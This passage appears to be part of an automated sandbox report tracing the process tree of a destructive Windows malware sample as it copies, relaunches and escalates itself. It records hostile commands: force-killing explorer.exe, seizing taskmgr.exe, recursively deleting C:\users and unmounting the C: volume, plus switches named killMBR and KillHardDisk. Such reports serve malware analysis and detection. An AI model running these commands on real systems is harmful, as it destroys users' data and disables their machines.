        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0183.exe 1697996445
        12⤵
        
        PID:9128
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0183.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0183.exe 1697996445
        13⤵
        
        PID:728
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:6424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:4204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:5960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /save 1697996445
        10⤵
        
        PID:952
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /save 1697996445
        11⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /protect 1697996445
        12⤵
        Executes dropped EXE
        
        PID:5920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe 1697996445
        13⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe 1697996445
        14⤵
        
        PID:10432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        15⤵
        
        PID:7732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        16⤵
        Kills process with taskkill
        
        PID:6012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe /autoup 1697996445
        15⤵
        
        PID:8880
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe /autoup 1697996445
        16⤵
        
        PID:3964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe /killwindows 1697996445
        15⤵
        
        PID:7016
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe /killwindows 1697996445
        16⤵
        
        PID:9984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        17⤵
        
        PID:7172
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        18⤵
        Modifies file permissions
        
        PID:1432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe /KillHardDisk 1697996445
        15⤵
        
        PID:5428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe /killMBR 1697996445
        15⤵
        
        PID:6356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe C:\windows\system32\taskmgr.exe
        15⤵
        
        PID:8736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe+38555.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe
        13⤵
        
        PID:11184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe 1697996445
        13⤵
        
        PID:9372
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe 1697996445
        14⤵
        
        PID:10648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        15⤵
        
        PID:7260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        16⤵
        Kills process with taskkill
        
        PID:764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe /autoup 1697996445
        15⤵
        
        PID:10360
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe /autoup 1697996445
        16⤵
        
        PID:4368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe /killwindows 1697996445
        15⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe /killwindows 1697996445
        16⤵
        
        PID:6276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe /KillHardDisk 1697996445
        15⤵
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d043.exe /killMBR 1697996445
        15⤵
        
        PID:9924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:6240
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:6328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /autoup 1697996445
        10⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /autoup 1697996445
        11⤵
        
        PID:9504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /killwindows 1697996445
        10⤵
        
        PID:9400
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /killwindows 1697996445
        11⤵
        
        PID:8680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:4044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /KillHardDisk 1697996445
        10⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /KillHardDisk 1697996445
        11⤵
        
        PID:9952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:1524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:11760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:4492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:11616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:4640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /killMBR 1697996445
        10⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /killMBR 1697996445
        11⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe /autoup 1697996445
        12⤵
        
        PID:8708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /protect 1697996445
        10⤵
        
        PID:10004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /autoup 1697996445
        10⤵
        
        PID:6976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:8660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+09909.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        8⤵
        
        PID:1676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe 1697996445
        8⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:5668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /protect 1697996445
        10⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /protect 1697996445
        11⤵
        Executes dropped EXE
        
        PID:6548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe+019712.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe
        12⤵
        
        PID:4308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe 1697996445
        12⤵
        
        PID:10656
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe 1697996445
        13⤵
        
        PID:1644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:7708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:6468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe /autoup 1697996445
        14⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe /autoup 1697996445
        15⤵
        
        PID:5296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe /killwindows 1697996445
        14⤵
        
        PID:3444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe /KillHardDisk 1697996445
        14⤵
        
        PID:1812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0100.exe /killMBR 1697996445
        14⤵
        
        PID:8664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe+918981.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0109.exe
        12⤵
        
        PID:6492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0109.exe 1697996445
        12⤵
        
        PID:10692
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0109.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0109.exe 1697996445
        13⤵
        
        PID:8544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:4200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:11616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0109.exe /autoup 1697996445
        14⤵
        
        PID:10896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0109.exe /killwindows 1697996445
        14⤵
        
        PID:7352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /save 1697996445
        10⤵
        
        PID:7416
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /save 1697996445
        11⤵
        Executes dropped EXE
        
        PID:1596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:9544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:9172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /autoup 1697996445
        10⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /autoup 1697996445
        11⤵
        
        PID:8692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /killwindows 1697996445
        10⤵
        
        PID:10020
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /killwindows 1697996445
        11⤵
        
        PID:9964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /KillHardDisk 1697996445
        10⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /KillHardDisk 1697996445
        11⤵
        
        PID:4264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /killMBR 1697996445
        10⤵
        
        PID:10504
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /killMBR 1697996445
        11⤵
        
        PID:9072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe /KillHardDisk 1697996445
        10⤵
        
        PID:9096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        6⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        7⤵
        Executes dropped EXE
        
        PID:3004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        6⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:1616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
        8⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:7368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:8180
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:10140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+4306.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        8⤵
        
        PID:5528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+729543.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe
        8⤵
        
        PID:7472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe 1697996445
        8⤵
        
        PID:6976
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe 1697996445
        9⤵
        
        PID:2696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:4084
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /autoup 1697996445
        10⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /autoup 1697996445
        11⤵
        
        PID:532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /killwindows 1697996445
        10⤵
        
        PID:7196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /KillHardDisk 1697996445
        10⤵
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /KillHardDisk 1697996445
        11⤵
        
        PID:7148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /killMBR 1697996445
        10⤵
        
        PID:6264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /killwindows 1697996445
        10⤵
        
        PID:9112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        6⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        7⤵
        Executes dropped EXE
        
        PID:5152
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        6⤵
        
        PID:5352
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        6⤵
        
        PID:5376
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:1972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:6756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+12056.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
      4⤵
      PID:3616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe 1697996445
      4⤵
      PID:4632
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe 1697996445
        5⤵
        Executes dropped EXE
        
        PID:796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        6⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:2252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
        8⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:7048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7508
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:9292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /autoup 1697996445
        10⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /autoup 1697996445
        11⤵
        
        PID:9488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /killwindows 1697996445
        10⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
